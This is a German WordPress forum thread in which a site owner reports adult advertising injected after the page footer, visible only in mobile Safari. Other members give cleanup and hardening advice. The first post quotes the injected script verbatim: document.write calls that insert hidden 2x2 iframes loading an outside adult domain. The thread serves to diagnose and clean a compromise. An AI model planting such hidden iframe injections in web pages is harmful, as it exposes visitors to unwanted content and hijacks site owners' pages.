Code injection im Frontend nach dem Footer - Quelle finden

  • Hallo zusammen,

    mir ist gestern aufgefallen, dass auf meiner selbstgehosteten WP-Seite nach dem Footer plötzlich Porno-Werbung auftaucht. Allerdings nur bei Nutzung des mobilen Safari, Opera und Firefox zeigen es nicht an.

    Im Quelltext der Seite taucht am Ende folgendes javascript auf:

    Zitat

    ...</body>
    </html><script type="text/javascript" language="javascript" >document.write('<iframe src="http://mass-orgy.com" frameborder="no" align="center" height="2" width="2"></iframe>');</script><script type="text/javascript" language="javascript" >document.write('<iframe src="http://mass-orgy.com" frameborder="no" align="center" height="2" width="2"></iframe>');</script>

    Damit habe ich den Übeltäter also entdeckt. Das Problem ist nur, dass ich nicht weiß, wo dieser Code in die Seite geschrieben wird. Ein Wechsel des Templates behob den Fehler nicht, also kann es nicht dort im Code stehen.

    Könnt ihr mir helfen, dieses Script von der Seite zu bekommen?

    Danke!

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Dann solltest du vielleicht mal alle Plugins deaktiviert.
    Wenn das nicht hilft, steht es vielleicht in einer der Datenbank-Tabellen.

    [size=10]Bitte immer zuerst die Forensuche nutzen und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.
    Kein Support per PN - Fragen gehören ins Forum.[/SIZE]
    [size=8]Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)[/SIZE]

  • Der Code kann in jeder Datei auf dem Server stecken. Durchsuche bitte die zahlreichen Beiträge zum Thema "Blog gehacked" hier im Forum. Es gibt etliche mit diversen Hinweisen. Du kannst erstmal keiner Datei mehr auf dem Server trauen. Und bitte: Nimm die Seite offline, bevor sich andere User noch was einfangen. Wenn Du Dir das mit dem Reinigen der Seite nicht zutraust, dann suche Dir professionelle Hilfe im Jobforum.

  • Hey,

    danke für die Hilfe. Alle Plugins scheinen sauber zu sein, habe ich getestet. Das Theme ja auch, schließlich hat der Wechsel des selbigen ja auch keine Änderung bewirkt. Bleibt eigentlich doch nur noch die Datenbank, oder? Gibts ein gutes Tool um alle Dateien und die DB nach Begriffen zu durchsuchen (hier also z.B. die verlinkte URL)?

    Keine Sorge, Site ging sofort in Wartung als ich es gesehen habe. Merkwürdig aber auch, dass das Script nur im mobilen Abruf über Safari auf iPad und iPhone auftaucht. Auf dem PC steht es zwar im Quellcode wird aber augenscheinlich rausgeblockt.

  • Problem gelöst. Wordfence hat ganze Arbeit geleistet und die kompromittierten Dateien gefunden und wieder in den Orginalzustand versetzt!

    Danke für eure Hilfe!

  • Problem gelöst.

    Nein - leider nicht. Die Sicherheitslücke kannst du leider nicht mit einem Plugin beseitigen. Du musst feststellen, wie die Datei (in der Regel sind dies Dateien (!) geändert oder neu erstellt wurden. Mit Tools wie Wordfence kannst du dies leider nicht.

    Dein Angriff ist nicht harmlos, der Angreifer richtet sich nur an bestimmte Kundengruppen von dir. Vorsicht!

    Mit offenen Augen träumen

  • In der Regel sind es eben diese - sagen wir einfach mal - "lückenhaften" Plugins und/oder Themes, die sich selber wiederum externer Skripte und Frameworks bedienen. Als Beispiel sei hier nur mal timthumb angeführt, das zwar mittlerweile gefixt wurde, aber in unzähligen Blogs immer noch in der alten Version seinen Dienst verrichtet. Sprich: Freifahrtsschein für Injections!

    Never use outdated plugins! :)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!